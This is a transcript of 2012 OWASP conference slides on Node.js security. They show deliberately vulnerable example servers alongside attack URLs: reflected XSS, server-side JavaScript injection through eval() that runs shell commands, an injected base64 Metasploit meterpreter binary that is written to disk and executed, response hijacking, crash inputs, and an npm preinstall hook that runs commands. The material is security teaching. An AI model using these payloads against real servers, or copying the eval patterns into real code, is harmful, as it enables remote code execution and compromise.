ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch
-
Upload
application-security-forum-western-switzerland -
Category
Documents
-
view
5.408 -
download
0
description
Transcript of ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch
![Page 1: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/1.jpg)
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation http://www.owasp.org
Sven Vetsch Redguard AG [email protected] www.redguard.ch @disenchant_ch / @redguard_ch
Application Security Forum Western Switzerland 2012
November 8th 2012
Node.js Security"Old vulnerabilities in new dresses
![Page 2: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/2.jpg)
Sven Vetsch § Partner & CTO at Redguard AG
§ www.redguard.ch § Specialized in Application Security
§ (Web, Web-Services, Mobile, …) § Leader OWASP Switzerland
§ www.owasp.org / www.owasp.ch
Twitter: @disenchant_ch / @redguard_ch
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 2
![Page 3: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/3.jpg)
Table of Contents I. Node.js II. Node.js Security III. Wrap Up IV. Q & A
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 3
![Page 4: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/4.jpg)
Remarks
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 4
Don’t use any of the code shown in this presentation unless you want to write insecure software!
We won’t really go into how to avoid and fix things. You will see, that we’ll just talk about new possibilities
on exploiting well-known vulnerabilities anyway.
![Page 5: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/5.jpg)
Node.js
JavaScript on your Server
I
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 5
![Page 6: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/6.jpg)
Wait what…? § Node aka. Node.js § Open Source (http://nodejs.org/)
§ Platform built on Google's JavaScript runtime (V8) § For easily building fast and scalable network
applications § Node uses an event-driven, non-blocking I/O model § Lightweight and efficient - perfect for data-intensive
real-time applications that run across distributed devices.
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 6
![Page 7: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/7.jpg)
Node.js Processing Model
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 7
© by Aaron Stannard
![Page 8: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/8.jpg)
In short… “Node allows JavaScript to be executed
server-side and provides APIs (i.e. to work with files and talk to devices on a network).”
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 8
![Page 10: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/10.jpg)
Hello World var http = require('http'); http.createServer(function (req, res) {
res.writeHead(200, { 'Content-Type': 'text/plain’
});
res.end('Hello World\n'); }).listen(1337, '127.0.0.1');
console.log('Server running at http://127.0.0.1:1337/');
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 10
![Page 11: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/11.jpg)
Working with (GET) Parameters var http = require('http'); var url = require('url');
http.createServer(function (req, res) { res.writeHead(200, {
'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query;
var name = queryData.name; console.log("Hello " + name);
res.end("Hello " + name); }).listen(1337, '127.0.0.1');
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 11
![Page 12: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/12.jpg)
Working with (GET) Parameters var http = require('http'); var url = require('url');
http.createServer(function (req, res) { res.writeHead(200, {
'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query;
var name = queryData.name; console.log("Hello " + name);
res.end("Hello " + name); }).listen(1337, '127.0.0.1');
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 12
![Page 13: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/13.jpg)
Using %07 (BEL character) your machine goes bing
Funfact
![Page 15: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/15.jpg)
So you’re saying … var http = require('http'); var url = require('url');
http.createServer(function (req, res) { res.writeHead(200, {
'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query;
var name = queryData.name; console.log("Hello " + name);
res.end("Hello " + name); }).listen(1337, '127.0.0.1');
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 15
![Page 16: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/16.jpg)
Reflecting XSS http://example.com/?name=<script>alert(1);</script>
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 16
![Page 17: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/17.jpg)
Server Side JavaScript Injection § It’s much like DOM-based XSS and all the
know sources and sinks also work on Node. § http://code.google.com/p/domxsswiki/wiki/Index
§ Interesting is everything that performs an eval()
§ eval() is (and stays) evil
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 17
![Page 18: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/18.jpg)
Server Side JavaScript Injection
Be serious, who would use eval() or for example let unchecked code reach a
setTimeout()?
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 18
![Page 19: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/19.jpg)
Server Side JavaScript Injection § Github returns 444’932 when searching for
“eval” in JavaScript code. § Of course not all of those are in fact insecure
usages of the eval() function
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 19
![Page 20: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/20.jpg)
Server Side JavaScript Injection § Another example: How do you convert
JSON back to an object?
§ The good answer: JSON.parse(str);
§ The bad (but easier and more intuitive) answer: eval(str);
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 20
![Page 21: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/21.jpg)
Server Side JavaScript Injection § “First, you'll use a JavaScript eval() function
to convert the JSON string into JavaScript objects.” return eval(json);
(https://developers.google.com/web-toolkit/doc/latest/tutorial/JSON)
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 21
![Page 22: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/22.jpg)
Server Side JavaScript Injection § “With JSON, you use JavaScript's array and object
literals syntax to define data inside a text file in a way that can be returned as a JavaScript object using eval().” var jsondata = eval("("+mygetrequest.responseText+")")
(http://www.javascriptkit.com/dhtmltutors/ajaxgetpost4.shtml)
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 22
![Page 23: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/23.jpg)
(Ab)using JSON ...
var queryData = url.parse(req.url, true).query;
if (queryData.jsonString) {
var jsonObject =
eval('(' + queryData.jsonString + ')');
res.end(jsonObject.order[0].name+" ordered one "
+jsonObject.order[0].beer);
} else {
res.end("Please place your order.");
}
}).listen(1337, '127.0.0.1');
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 23
![Page 24: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/24.jpg)
(Ab)using JSON http://example.com/?jsonString={"order":[{"name":"John","beer":"Murphy’s Red"}]}
And because of: eval('(' + queryData.jsonString + ')');
http://example.com/?jsonString={"order":[{"name":"John”,"beer":console.log(1)}]}
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 24
![Page 25: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/25.jpg)
Code Execution var http = require('http'); var url = require('url'); http.createServer(function (req, res) { var queryData = url.parse(req.url, true).query; eval("console.log('"+queryData.log+"')"); res.writeHead(200, { 'Content-Type': 'text/plain’ }); res.end('Hello World\n'); }).listen(1337, '127.0.0.1');
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 25
![Page 26: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/26.jpg)
Code Execution var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } Exec("ls -lah", puts);
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 26
![Page 27: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/27.jpg)
Code Execution http://example.com/?log=1');var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } exec("ls -lah", puts);//
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 27
![Page 28: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/28.jpg)
Metasploit meterpreter http://example.com/?log=1');var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } exec("echo 'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAibAAAA4gAAAAcAAAAAEAAAMdv341NDU2oCsGaJ4c2Al1towKgOAWgCAB%2bQieFqZlhQUVeJ4UPNgLIHuQAQAACJ48HrDMHjDLB9zYBbieGZtgywA82A/%2bE=' | base64 -d > x; chmod 777 x; ./x;", puts);//
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 28
![Page 29: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/29.jpg)
Hijack Response http://example.com/?log=1');var orig = http.ServerResponse.prototype.write; function newWrite (chunk) {orig.call(this, chunk%2b' hijacked');} http.ServerResponse.prototype.write = newWrite;//
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 29
![Page 30: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/30.jpg)
An unhandled exception crashes your server.
Funfact
![Page 31: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/31.jpg)
Simple Crash Demo var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type': 'text/html'}); var queryData = url.parse(req.url, true).query; var number_of_decimals = 1; if (queryData.nod) {number_of_decimals = queryData.nod;} res.end( Math.PI.toFixed(number_of_decimals).toString() ); }).listen(1337, '127.0.0.1');
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 31
![Page 32: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/32.jpg)
Simple Crash Demo var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type': 'text/html'}); var queryData = url.parse(req.url, true).query; var number_of_decimals = 1; if (queryData.nod) {number_of_decimals = queryData.nod;} res.end( Math.PI.toFixed(number_of_decimals).toString() ); }).listen(1337, '127.0.0.1');
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 32
![Page 33: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/33.jpg)
Simple Crash Demo number.toFixed( [digits] ) § digits The number of digits to appear after the decimal point; this may be a value between 0 and 20, inclusive, and implementations may optionally support a larger range of values. If this argument is omitted, it is treated as 0.
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 33
![Page 34: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/34.jpg)
Simple Crash Demo http://example.com/?nod=-1
... or ...
http://example.com/?nod=21
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 34
![Page 35: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/35.jpg)
Does Node.js support… Sessions NO
Permanent Data Storage NO
Caching NO
Database Access NO
Logging NO
Default Error Handling NO
… Most likely NO
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 35
![Page 36: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/36.jpg)
npm - Node Packaged Modules
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 36
§ npm is a Node.js package manager § https://npmjs.org/
§ De-facto standard § Open – everyone can publish packages
![Page 37: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/37.jpg)
npm - Node Packaged Modules
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 37
§ npm init
§ Edit package.json like we’ll see in a second § npm pack
§ npm install evilModule-1.2.3.tgz
§ Publish J
![Page 38: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/38.jpg)
npm - Node Packaged Modules
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 38
{ "author": "Sven Vetsch", "name": "evilModule", "version": "1.2.3", "scripts": { "preinstall": "ls -lah; whoami" } }
![Page 40: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/40.jpg)
Wrap Up § Using Node.js can be a good thing but you
§ have to care about a lot of things § know the modules you can use § need to write a lot of code yourself until someone writes
a module for it § We have to wait for (and help) improve modules that
make Node.js applications more secure. § Training for developers is key as they can’t write
secure Node.js application without even understanding the most simple XSS vectors.
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 40
![Page 41: ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven Vetsch](https://reader034.fdocuments.us/reader034/viewer/2022042814/555a86e4d8b42a98568b5160/html5/thumbnails/41.jpg)
Q & A
@disenchant_ch / @redguard_ch
IV
8 November 2012 OWASP Foundation | Sven Vetsch | [email protected] 41